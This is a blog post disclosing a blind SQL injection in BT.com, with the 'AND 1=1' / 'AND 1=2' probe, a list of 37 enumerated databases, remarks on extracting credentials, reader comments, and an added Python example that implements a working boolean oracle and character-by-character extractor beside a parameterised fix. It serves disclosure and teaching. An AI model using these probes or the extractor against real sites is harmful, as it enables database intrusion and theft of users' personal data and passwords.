
Posted by unu in English News

Posted on March 10th, 2009

british telecom hacked

We held back publication of the vulnerable parameter, which allowed full access to ALL the databases on the main server, until the issue had been dealt with. Today all the vulnerable pages were taken offline for maintenance and security testing, so we can now continue with the disclosure.

Because this is a blind SQL injection, the results of the injection are never shown in the web page itself, so there is nothing to screenshot on that side. I took two screenshots that show the parameter is vulnerable. In the first one you can see that appending AND+1=1 (the + is just the URL-encoded space), a condition that is always true, leaves the whole content displayed:

In the second, where we append AND+1=2, a condition that is always false, the page does not load. A parameter that behaves differently for those two requests is handing its value straight to the SQL parser, and that yes/no difference is the whole channel used below.

Now let's see which databases we gained access to:

available databases [37]:
[*] BT
[*] BT_Argos
[*] BT_BB_Anywhere
[*] BT_BBAndLine
[*] BT_BroadbandOpenzone
[*] BT_Bundling
[*] BT_CallMeArgos
[*] BT_CallSave
[*] BT_CallSaveStaff
[*] BT_comparebroadband
[*] BT_dabsCallback
[*] BT_DigitalVaultPlus
[*] BT_DisneyComp
[*] BT_HomeITCall
[*] BT_HomeITInstall
[*] BT_ITCalculator
[*] BT_Main
[*] BT_MobilePicker_Flexible
[*] BT_NetProtectOrder
[*] BT_ppc
[*] BT_PrinceCaspian
[*] BT_recontracting
[*] BT_RecontractingGenZ
[*] BT_SecureAdmin
[*] BT_SimOffer
[*] BT_Tactical_oneclick
[*] BT_TellAFriend
[*] BT_Tinkerbell
[*] BT_TotalBroadband
[*] BT_VisionOrderJourney
[*] BTM00585
[*] Crayon_Utility
[*] master
[*] MobilePortal
[*] model
[*] msdb
[*] tempdb

The first database, "BT", is the most interesting one, but the others also yield a wealth of data about users: personal data, passwords, etc. (The master, model, msdb and tempdb entries identify the back end as Microsoft SQL Server.)

The name and [censored for security reasons] columns can be extracted easily; they contain login data for the various databases (default_[censored for security reasons]). The name and password of the sysusers entries can be extracted just as easily, and that data gives direct access to the server.

Database: m*****
Table: s*****
[18 columns]
+-------------+-----------+
| Column      | Type      |
+-------------+-----------+
(Content removed for security reasons)

This blind SQL injection gives far more access, to a far larger part of the databases, than the one behind the previous BT.com vulnerability. Using it, an attacker could read users' personal data.
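The two-request test described above, and the character-by-character extraction it makes possible, as an added example that is not code from the original post or from BT: a hypothetical page handler running against an in-memory SQLite database that stands in for the MS SQL Server behind BT.com, with the same handler parameterised beside it. The table names, the rows, the "sa" password and the product id 7 are all invented for the example; the SQL Server spelling of the character test is noted in a comment.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the back end: an in-memory SQLite database standing in
    for the MS SQL Server behind the page. Table names, rows and the password are
    invented for this example."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, live INTEGER);
        INSERT INTO products VALUES (7, 'Total Broadband', 1);
        CREATE TABLE sysusers_demo (name TEXT, password TEXT);
        INSERT INTO sysusers_demo VALUES ('sa', 'Summer2009!');
    """)
    return con


def vulnerable_page(con, product_id):
    """Hypothetical handler with the defect the post describes: the request parameter
    is concatenated into the SQL text, and the page is either rendered (rows came
    back) or blank (no rows). Nothing from the database is echoed directly."""
    sql = "SELECT name FROM products WHERE live = 1 AND id = " + product_id
    rows = con.execute(sql).fetchall()
    return "<h1>%s</h1>" % rows[0][0] if rows else ""


def hardened_page(con, product_id):
    """Same handler with a parameterised query: the injected text is compared as a
    value, never parsed as SQL, so the boolean oracle disappears."""
    sql = "SELECT name FROM products WHERE live = 1 AND id = ?"
    rows = con.execute(sql, (product_id,)).fetchall()
    return "<h1>%s</h1>" % rows[0][0] if rows else ""


class CountingPage:
    """Wraps a page function and counts requests, to show what blind extraction costs."""
    def __init__(self, fn):
        self.fn, self.calls = fn, 0

    def __call__(self, param):
        self.calls += 1
        return self.fn(param)


def probe(page):
    """The two-request test from the post: 'AND 1=1' must keep the content and
    'AND 1=2' must blank it. Only a parameter whose value reaches the SQL parser
    behaves differently for the two."""
    return page("7 AND 1=1") != "" and page("7 AND 1=2") == ""


def oracle(page, condition):
    """One yes/no question to the back end: does the page still render when
    `condition` is ANDed onto the WHERE clause?"""
    return page("7 AND (%s)" % condition) != ""


def extract_string(page, expr, max_len=64):
    """Recover the value of the SQL expression `expr` one character at a time,
    binary-searching the character code with 7 oracle questions per character.
    SQLite spelling is used here; on MS SQL the same test is
    ASCII(SUBSTRING(expr, pos, 1)) > mid."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(page, "unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # past the end of the string: substr() is '' and unicode('') is NULL,
            # so every comparison is false and the search bottoms out at 0
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    con = build_db()
    vuln = CountingPage(lambda p: vulnerable_page(con, p))
    safe = CountingPage(lambda p: hardened_page(con, p))
    print("vulnerable parameter:", probe(vuln))
    print("hardened parameter:  ", probe(safe))
    first_table = extract_string(
        vuln, "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)")
    secret = extract_string(vuln, "(SELECT password FROM sysusers_demo WHERE name='sa')")
    print("first table name:", first_table)
    print("sa password:     ", secret, "(%d requests so far)" % vuln.calls)
```

The point of the counter is the cost model: with a yes/no oracle every character costs a fixed seven requests, so an 11-character password is 84 page loads and a whole table is still only minutes of traffic. Against the parameterised handler both probe requests come back blank, because "7 AND 1=1" is compared to the id column as a single value rather than parsed as SQL.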

Don't rush to conclusions and start pointing fingers before you have seen the next articles, where we will show similar issues at other large telecommunication providers. As we said earlier, we don't take sides; we want to show that vulnerabilities like the ones above can be found almost everywhere.

We would like to thank BT.com for the fair play and manners they showed in addressing this issue in the email we received from them.

We appreciate and support such a mature and to-the-point attitude; it matters a great deal to us.



5 Responses to “Sql Injection in BT.com – episode 2”

  1. m2k Says:

    ...I wonder what others would do in your place, black...? And what will happen once you retire? By the way, is it really worth it, do you get any benefits for what you do?! :) all the best... m2k

  2. Nabzor Says:

    "By the way, is it really worth it, do you get any benefits for what you do?! :)"

    It's as if you were employed by these companies, only you don't get a salary. You fix their sites for free. Nice :D

  3. virgil Says:

    What's the idea with "The user and [censored for security reasons] can be easily extracted."? It's shady, what got into you?

  4. 2fingers Says:

    That data could help the wrong people in a potential attack. We are talking about an enormous number of people who could be affected by such an attack. We don't like to play with people's lives.

  5. L’Inghilterra è sotto attacco - parte 2 - Appunti Digitali Says:

    [...] not only answered the British company's "minimalist" line but actually pushed the problem further. In the update on the story, another [...] is highlighted
